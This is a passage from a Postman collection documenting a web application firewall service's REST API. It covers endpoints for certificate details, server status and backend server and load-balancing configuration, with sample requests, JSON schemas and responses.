{{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertdetail?id={{id}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","intercertdetail"],"query":[{"key":"id","value":"{{id}}"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"296"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e92e0f63-86a0-11e9-934e-4145cc4e25d4"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avtI8EX5IAMFqlg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf6289f-89f6a2e4ec4ac48237acbe68;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"extension\": [\n            {\n                \"Critical\": \"Yes\",\n                \"Content\": \"Digital Signature, Certificate Sign, CRL Sign\",\n                \"Name\": \"keyUsage\"\n            },\n            {\n                \"Critical\": \"No\",\n                \"Content\": \"Any Extended Key Usage\",\n                \"Name\": \"extendedKeyUsage\"\n            },\n            {\n                \"Critical\": \"Yes\",\n                \"Content\": \"CA:TRUE\",\n                \"Name\": \"basicConstraints\"\n            },\n            {\n                \"Critical\": \"No\",\n                \"Content\": \"keyid:9A:F1:9F:B9:25:12:12:89:EC:73:18:B9:97:BC:C5:F8:A0:0A:7E:53\\n\",\n                \"Name\": \"authorityKeyIdentifier\"\n            },\n            {\n                \"Critical\": \"No\",\n                \"Content\": \"28:81:26:05:D1:34:1A:3F:C1:73:0F:BB:93:CF:15:1C:3F:03:BF:7F\",\n                \"Name\": \"subjectKeyIdentifier\"\n            }\n        ],\n        \"subject\": \"C=CN, O=MySSL, OU=MySSL Test RSA - For test use only, CN=MySSL.com\",\n        \"valid_to\": \"2027-11-16 05:35:35 UTC\",\n        \"valid_from\": \"2017-11-16 05:35:35 UTC\",\n        \"serial_number\": \"48:42:16:0c:f7:d6:4c:32:99:71:63:72:2f:63:be:7e\",\n        \"version\": 3,\n        \"issuer\": \"C=CN, O=MySSL, OU=MySSL Test Root - For test use only, CN=MySSL.com\"\n    }\n}"},{"id":"74ec1406-a08d-405c-811f-1f83f49762b9","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertdetail?id={{id}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","intercertdetail"],"query":[{"key":"id","value":"{{id}}"}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:57 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"faedfa15-86a0-11e9-9e5c-4b813cea4e85"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avtNmHoloAMFqMw="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"8c59cbe9-9f72-47e0-a929-7cbe13bc12a4"},{"name":"Get Server Status","id":"a38db08d-876f-4bff-b8a9-2a0b6cb53113","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/pserver_status","description":"<p>Get the information of server status on DASHBOARD tab.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","pserver_status"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"6a272eca-3a3d-4e6c-adb4-62f5666fe282","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/pserver_status","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","pserver_status"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:44:30 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"146"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"38131e95-8bfb-11e9-b33d-d1b8091a5f96"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGKAxGuQyQ0FWHw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff239e-d76cb240a1604fc676eb9372;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"health_check\": true,\n    \"servers\": [\n        {\n            \"status\": \"active\",\n            \"addr\": \"116.211.184.212\"\n        }\n    ],\n    \"counter\": {\n        \"active\": 1,\n        \"out_of_service\": 0,\n        \"disabled\": 0\n    }\n}"},{"id":"eed2864f-dac3-47ac-b9d5-5f2751e74873","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Bearer2 {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/pserver_status","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","pserver_status"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:45:55 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"6aca84e5-8bfb-11e9-9c24-8f0e172aff60"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"bGKOEExkyQ0Foyg="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"a38db08d-876f-4bff-b8a9-2a0b6cb53113"},{"name":"Get Servers","id":"690389fe-9366-4641-ad19-37ee7cd51fd5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","description":"<p>Get the configuration information of servers.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","servers"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"12ca08b3-d271-4837-b592-7cb21efee27f","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","servers"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:34:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"9cc9e8b8-86a3-11e9-9c56-5df7ca7fdfd7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avv-PF-5IAMF40A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"e5743d66-8ac9-485a-8dd6-3097078760ef","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","servers"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:21:18 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"417"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"b8ae2dfa-86a1-11e9-9dc2-c195e9856560"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avt_VHGLoAMFrzg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf629fb-a24c19a6c1f619222a3e76b4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"server_lb\": {\n        \t\"server_balance\": \"enable\",\n            \"lb_algorithm\": \"round-robin\",\n            \"persistence_policy\": {\n                \"persistence_type\": \"source-ip\",\n                \"sourceip_timeout\": 300\n            },\n            \"health\": {\n                \"health_check\": \"enable\",\n                \"url_path\": \"/\",\n                \"interval\": 10,\n                \"health_check_timeout\": 3,\n                \"retry_times\": 3,\n                \"method\": \"head\",\n                \"response_code\": 200\n            }\n        },\n        \"server_list\": [\n            {\n                \"set_server_status\": \"enable\",\n                \"server_status\": \"up\",\n                \"server_port\": 443,\n                \"http2\": \"disable\",\n                \"weight\": 1,\n                \"backup\": \"disable\",\n                \"ssl\": \"enable\",\n                \"server_type\": \"domain\",\n                \"server_address\": \"test.timweb-cloud-test.com\",\n                \"tls_1_0\": \"enable\",\n                \"tls_1_1\": \"enable\",\n                \"tls_1_2\": \"enable\",\n                \"tls_1_3\": \"enable\",\n                \"encryption_level\": \"high\"\n            }\n        ]\n    }\n}"}],"_postman_id":"690389fe-9366-4641-ad19-37ee7cd51fd5"},{"name":"Update Servers","id":"a38cf780-c6e2-47d6-85ce-6356381b359a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"server_lb\": {\n    \t\"server_balance\": \"enable\",\n        \"lb_algorithm\": \"weighted-round-robin\",\n        \"persistence_policy\": {\n            \"persistence_type\": \"insert-cookie\",\n            \"sourceip_timeout\": 300,\n            \"cookie_timeout\": 20,\n            \"cookie_path\": \"/\",\n            \"cookie_domain\": \"www.test.com\",\n            \"cookie_name\": \"testCookie\"\n        },\n        \"health\": {\n            \"health_check\": \"enable\",\n            \"url_path\": \"/\",\n            \"interval\": 10,\n            \"health_check_timeout\": 3,\n            \"retry_times\": 3,\n            \"method\": \"get\",\n            \"response_code\": 200,\n            \"matched\": \"test\"\n        }\n    },\n    \"server_list\": [\n        {\n            \"set_server_status\": \"enable\",\n            \"server_type\": \"domain\",\n            \"server_address\": \"test.tim-cloud-test.com\",\n            \"server_port\": 443,\n            \"weight\": 1,\n            \"backup\": \"disable\",\n            \"ssl\": \"enable\",\n            \"http2\": \"disable\",\n            \"tls_1_0\": \"enable\",\n            \"tls_1_1\": \"enable\",\n            \"tls_1_2\": \"enable\",\n            \"tls_1_3\": \"enable\",\n            \"encryption_level\": \"high\"\n        },\n        {\n            \"set_server_status\": \"enable\",\n            \"server_type\":\"dynamic\",\n            \"cloud_connector\": \"aws_1\",\n            \"filter\": [\n                {\n                    \"Name\": \"instance-id\",\n                    \"Values\": [\"i-1234567890\"]\n                },\n                {\n                    \"Name\": \"tag:available_time\",\n                    \"Values\": [\"working_hours\"]\n                }\n            ],\n            \"server_port\": 443,\n            \"weight\": 1,\n            \"backup\": \"disable\",\n            \"ssl\": \"enable\",\n            \"http2\": \"disable\",\n            \"tls_1_0\": \"disable\",\n            \"tls_1_1\": \"disable\",\n            \"tls_1_2\": \"enable\",\n            \"tls_1_3\": \"enable\",\n            \"encryption_level\": \"high\"\n        }\n    ]\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","description":"<p>Modify the servers' configuration.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"server_lb\": {\n            \"server_balance\": {\n                \"description\": \"Enable/Disable Server Balance for current application.\",\n                \"type\": \"string\",\n                \"enum\": [\"disable\", \"enable\"],\n            \"lb_algorithm\": {\n                \"description\": \"Configure how to distribute new TCP connections.\",\n                \"type\": \"string\",\n                \"enum\": [\"round-robin\", \"weighted-round-robin\", \"least-connections\"]\n            },\n            \"persistence_policy\": {\n                \"persistence_type\": {\n                    \"description\": \"Specify how TIM Host Protection determines a request is the subsequent request from a client.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"disable\", \"source-ip\", \"insert-cookie\"]\n                },\n                \"sourceip_timeout\": {\n                    \"description\": \"The maximum amount of time between requests that TIM Host Protection maintains persistence, in seconds, only available on persistence_type. 'source-ip'.\",\n                    \"type\": \"integer\",\n                    \"minimum\": 10,\n                    \"maximum\": 86400\n                },\n                \"cookie_timeout\": {\n                    \"description\": \"The time in seconds where the connection is idle after which TIM Host Protection will choose a new server from the pool, only available on persistence_type. 'insert-cookie'.\",\n                    \"type\": \"integer\",\n                    \"minimum\": 10,\n                    \"maximum\": 86400\n                },\n                \"cookie_name\": {\n                    \"description\": \"The cookie name to be used when Inset Cookie method is selected, only available on persistence_type. 'insert-cookie'.\",\n                    \"type\": \"string\",\n                    \"maxLength\": 127\n                },\n                \"cookie_path\": {\n                    \"description\": \"The path attribute for the cookie that TIM Host Protection inserts, only available on persistence_type. 'insert-cookie'.\",\n                    \"type\": \"string\",\n                    \"maxLength\": 255\n                },\n                \"cookie_domain\": {\n                    \"description\": \"The domain attribute for the cookie that TIM Host Protection inserts, only available on persistence_type. 'insert-cookie'.\",\n                    \"type\": \"string\",\n                    \"maxLength\": 255\n                }\n            },\n            \"health\": {\n                \"health_check\": {\n                    \"description\": \"Enable/Disable health policy for the test of server. availability.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"disable\", \"enable\"]\n                },\n                \"url_path\": {\n                    \"description\": \"The URL that the HTTP or HTTPS request uses to verify the responsiveness of the server (for example, /index.html), only available on health_check 'enable'.\",\n                    \"type\": \"string\",\n                    \"maxLength\": 255\n                },\n                \"interval\": {\n                    \"description\": \"The number of seconds between each server health check, only available on health_check 'enable'.\",\n                    \"type\": \"integer\",\n                    \"minimum\": 1,\n                    \"maximum\": 300\n                },\n                \"health_check_timeout\": {\n                    \"description\": \"The maximum number of seconds that can pass after the server health check, only available on health_check 'enable'.\",\n                    \"type\": \"integer\",\n                    \"minimum\": 1,\n                    \"maximum\": 30\n                },\n                \"retry_times\": {\n                    \"description\": \"The number of times, if any, that TIM Host Protection retries a server health check after failure, only available on health_check 'enable'.\",\n                    \"type\": \"integer\",\n                    \"minimum\": 1,\n                    \"maximum\": 10\n                },\n                \"method\": {\n                    \"description\": \"Specify whether the health check uses the HEAD, GET, or POST method, only available on health_check 'enable'.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"head\", \"get\", \"post\"]\n                },\n                \"response_code\": {\n                    \"description\": \"The response code that you require the server to return to confirm that it is available, only available on health_check 'enable'.\",\n                    \"type\": \"integer\",\n                    \"minimum\": 200,\n                    \"maximum\": 599\n                },\n                \"matched\": {\n                    \"description\": \"Enter specfic content that must exist in the reply to confirm that the server is available, only available on method 'get' and 'post'.\",\n                    \"type\": \"string\",\n                    \"maxLength\": 2071\n                }\n            }\n        },\n        \"server_list\": [\n            {\n                \"set_server_status\": {\n                    \"description\": \"Select whether this server receives new sessions from TIM Host Protection WAFaas.\",\n                    \"type\": \"integer\",\n                    \"enum\": [\"disable\", \"enable\", \"maintain\"]\n                },\n                \"server_type\": {\n                    \"description\": \"Select IP, Domain or Dynamic to indicate how you want to define the server.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"ip\", \"domain\", \"dynamic\"]\n                },\n                \"server_address\": {\n                    \"description\":\"The IP address or fully-qualified domain name (FQDN) of the server, only available on server_type 'ip' or 'domain'.\",\n                    \"type\": \"string\"\n                },\n                \"cloud_connector\": {\n                    \"description\":\"The name of the Cloud Connector, only available on server_type 'dynamic'.\",\n                    \"type\": \"string\"\n                },\n                \"filter\": {\n                    \"description\": \"The filters of the Cloud Connector, only available on server_type 'dynamic'.\",\n                    \"type\": \"array\",\n                    \"items\": {\n                        \"Name\": {\n                            \"description\":\"The name of the filter key.\",\n                            \"type\": \"string\"\n                        },\n                        \"Values\": {\n                            \"description\": \"The values of the filter key.\",\n                            \"type\": \"array\",\n                            \"items\": {\n                                \"description\":\"The value of the filter key.\",\n                                \"type\": \"string\"\n                            }\n                        }\n                    }\n                },\n                \"server_port\": {\n                    \"description\":\"The TCP port number where this server listens for connections.\",\n                    \"type\": \"integer\",\n                    \"minimum\": 1,\n                    \"maximum\": 65535\n                },\n                \"weight\": {\n                    \"description\":\"Use weight to define how many connections a server receives. The higher the weight, the more connections the server receives.\",\n                    \"type\": \"integer\",\n                    \"minimum\": 1,\n                    \"maximum\": 9999\n                },\n                \"backup\": {\n                    \"description\": \"Enable/Disable backup.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"disable\", \"enable\"]\n                },\n                \"ssl\": {\n                    \"description\": \"Select whether this server connects with TIM Host Protection through HTTP or HTTPS.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"disable\", \"enable\"]\n                },\n                \"http2\": {\n                    \"description\": \"Select whether this server would use HTTP2 protocol if possible.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"disable\", \"enable\"]\n                },\n                \"http_port\": {\n                    \"description\":\"When 'server_balance' is 'disable'(single server mode), the 'ssl' must be 'enable' and only one server is permitted. The 'server_port' is the HTTPS service port, and 'http_port' is the HTTP service port.\",\n                    \"type\": \"integer\",\n                    \"minimum\": 1,\n                    \"maximum\": 65535\n                },\n                \"tls_1_0\": {\n                    \"description\": \"Enable/Disable the allowance of TSL 1.0, only available on ssl 'enable'.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"disable\", \"enable\"]\n                },\n                \"tls_1_1\": {\n                    \"description\": \"Enable/Disable the allowance of TSL 1.1, only available on ssl 'enable'.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"disable\", \"enable\"]\n                },\n                \"tls_1_2\": {\n                    \"description\": \"Enable/Disable the allowance of TSL 1.2, only available on ssl 'enable'.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"disable\", \"enable\"]\n                },\n                \"tls_1_3\": {\n                    \"description\": \"Enable/Disable the allowance of TSL 1.3, only available on ssl 'enable'.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"disable\", \"enable\"]\n                },\n                \"encryption_level\": {\n                    \"description\": \"Set 'medium' to allow other level ciphers, or set 'high' to only allow strong ciphers, only available on ssl 'enable'.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"medium\", \"high\"]\n                }\n            }\n        ]\n    }\n}\n  }\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","servers"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"4a1a4f6b-0576-4b0e-8cae-564bdb5e9929","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"server_lb\": {\n    \t\"server_balance\": \"enable\",\n        \"lb_algorithm\": \"weighted-round-robin\",\n        \"persistence_policy\": {\n            \"persistence_type\": \"insert-cookie\",\n            \"sourceip_timeout\": 300,\n            \"cookie_timeout\": 20,\n            \"cookie_path\": \"/\",\n            \"cookie_domain\": \"www.test.com\",\n            \"cookie_name\": \"testCookie\"\n        },\n        \"health\": {\n            \"health_check\": \"enable\",\n            \"url_path\": \"/\",\n            \"interval\": 10,\n            \"health_check_timeout\": 3,\n            \"retry_times\": 3,\n            \"method\": \"get\",\n            \"response_code\": 200,\n            \"matched\": \"test\"\n        }\n    },\n    \"server_list\": [\n        {\n            \"set_server_status\": \"enable\",\n            \"server_type\": \"domain\",\n            \"server_address\": \"test.timweb-cloud-test.com\",\n            \"server_port\": 443,\n            \"weight\": 1,\n            \"backup\": \"disable\",\n            \"ssl\": \"enable\",\n            \"http2\": \"disable\",\n            \"tls_1_0\": \"enable\",\n            \"tls_1_1\": \"enable\",\n            \"tls_1_2\": \"enable\",\n            \"tls_1_3\": \"enable\",\n            \"encryption_level\": \"high\"\n        },\n        {\n            \"set_server_status\": \"enable\",\n            \"server_type\":\"dynamic\",\n            \"fabric_connector\": \"aws_1\",\n            \"filter\": [\n                {\n                    \"Name\": \"instance-id\",\n                    \"Values\": [\"i-1234567890\"]\n                },\n                {\n                    \"Name\": \"tag:available_time\",\n                    \"Values\": [\"working_hours\"]\n                }\n            ],\n            \"server_port\": 443,\n            \"weight\": 1,\n            \"backup\": \"disable\",\n            \"ssl\": \"enable\",\n            \"http2\": \"disable\",\n            \"tls_1_0\": \"disable\",\n            \"tls_1_1\": \"disable\",\n            \"tls_1_2\": \"enable\",\n            \"tls_1_3\": \"enable\",\n            \"encryption_level\": \"high\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","servers"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"f8b8d95b-af06-49e8-ac26-bdf0bf6cce40","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"server_lb\": {\n    \t\"server_balance\": \"enable\",\n        \"lb_algorithm\": \"weighted-round-robin\",\n        \"persistence_policy\": {\n            \"persistence_type\": \"insert-cookie\",\n            \"sourceip_timeout\": 300,\n            \"cookie_timeout\": 20,\n            \"cookie_path\": \"/\",\n            \"cookie_domain\": \"www.test.com\",\n            \"cookie_name\": \"testCookie\"\n        },\n        \"health\": {\n            \"health_check\": \"enable\",\n            \"url_path\": \"/\",\n            \"interval\": 10,\n            \"health_check_timeout\": 3,\n            \"retry_times\": 3,\n            \"method\": \"get\",\n            \"response_code\": 200,\n            \"matched\": \"test\"\n        }\n    },\n    \"server_list\": [\n        {\n            \"set_server_status\": \"enable\",\n            \"server_port\": 443,\n            \"weight\": 1,\n            \"backup\": \"disable\",\n            \"ssl\": \"enable\",\n            \"http2\": \"disable\",\n            \"server_type\": \"domain\",\n            \"server_address\": \"test.timweb-cloud-test.com\",\n            \"tls_1_0\": \"enable\",\n            \"tls_1_1\": \"enable\",\n            \"tls_1_2\": \"enable\",\n            \"tls_1_3\": \"enable\",\n            \"encryption_level\": \"high\",\n            \"health_check\": \"enable\"\n        }\n    ]\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","servers"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:20:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"44"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"f440c12f-86a9-11e9-a4ee-bd0372d17d3e"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"av2n0HfsoAMFxOA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf637cb-13a2a7b01c3710724fc56bca;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\"detail\": \"successfully\"}"}],"_postman_id":"a38cf780-c6e2-47d6-85ce-6356381b359a"},{"name":"Test Dynamic Server","id":"d8968e5e-0cd0-48ba-a223-bad6aac9bad6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"cloud_connector\": \"aws_1\",\n    \"filter\": [\n        {\n            \"Name\": \"instance-id\",\n            \"Values\": [\"i-1234567890\"]\n        },\n        {\n            \"Name\": \"tag:available_time\",\n            \"Values\": [\"working_hours\"]\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/application/{ep_id}/dynamicservertest","description":"<p>Test the Dynamic Server and return the public IP list.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"cloud_connector\": {\n            \"description\":\"The name of the Cloud Connector, required.\",\n            \"type\": \"string\"\n        },\n        \"filter\": {\n            \"description\": \"The filters of the Cloud Connector, required.\",\n            \"type\": \"array\",\n            \"items\": {\n                \"Name\": {\n                    \"description\":\"The name of the filter key.\",\n                    \"type\": \"string\"\n                },\n                \"Values\": {\n                    \"description\": \"The values of the filter key.\",\n                    \"type\": \"array\",\n                    \"items\": {\n                        \"description\":\"The value of the filter key.\",\n                        \"type\": \"string\"\n                    }\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application","{ep_id}","dynamicservertest"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"15b82849-cc53-4e5f-b48b-db180e0123c3","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"server_lb\": {\n    \t\"server_balance\": \"enable\",\n        \"lb_algorithm\": \"weighted-round-robin\",\n        \"persistence_policy\": {\n            \"persistence_type\": \"insert-cookie\",\n            \"sourceip_timeout\": 300,\n            \"cookie_timeout\": 20,\n            \"cookie_path\": \"/\",\n            \"cookie_domain\": \"www.test.com\",\n            \"cookie_name\": \"testCookie\"\n        },\n        \"health\": {\n            \"health_check\": \"enable\",\n            \"url_path\": \"/\",\n            \"interval\": 10,\n            \"health_check_timeout\": 3,\n            \"retry_times\": 3,\n            \"method\": \"get\",\n            \"response_code\": 200,\n            \"matched\": \"test\"\n        }\n    },\n    \"server_list\": [\n        {\n            \"set_server_status\": \"enable\",\n            \"server_type\": \"domain\",\n            \"server_address\": \"test.timweb-cloud-test.com\",\n            \"server_port\": 443,\n            \"weight\": 1,\n            \"backup\": \"disable\",\n            \"ssl\": \"enable\",\n            \"http2\": \"disable\",\n            \"tls_1_0\": \"enable\",\n            \"tls_1_1\": \"enable\",\n            \"tls_1_2\": \"enable\",\n            \"tls_1_3\": \"enable\",\n            \"encryption_level\": \"high\"\n        },\n        {\n            \"set_server_status\": \"enable\",\n            \"server_type\":\"dynamic\",\n            \"fabric_connector\": \"aws_1\",\n            \"filter\": [\n                {\n                    \"Name\": \"instance-id\",\n                    \"Values\": [\"i-1234567890\"]\n                },\n                {\n                    \"Name\": \"tag:available_time\",\n                    \"Values\": [\"working_hours\"]\n                }\n            ],\n            \"server_port\": 443,\n            \"weight\": 1,\n            \"backup\": \"disable\",\n            \"ssl\": \"enable\",\n            \"http2\": \"disable\",\n            \"tls_1_0\": \"disable\",\n            \"tls_1_1\": \"disable\",\n            \"tls_1_2\": \"enable\",\n            \"tls_1_3\": \"enable\",\n            \"encryption_level\": \"high\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","servers"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request 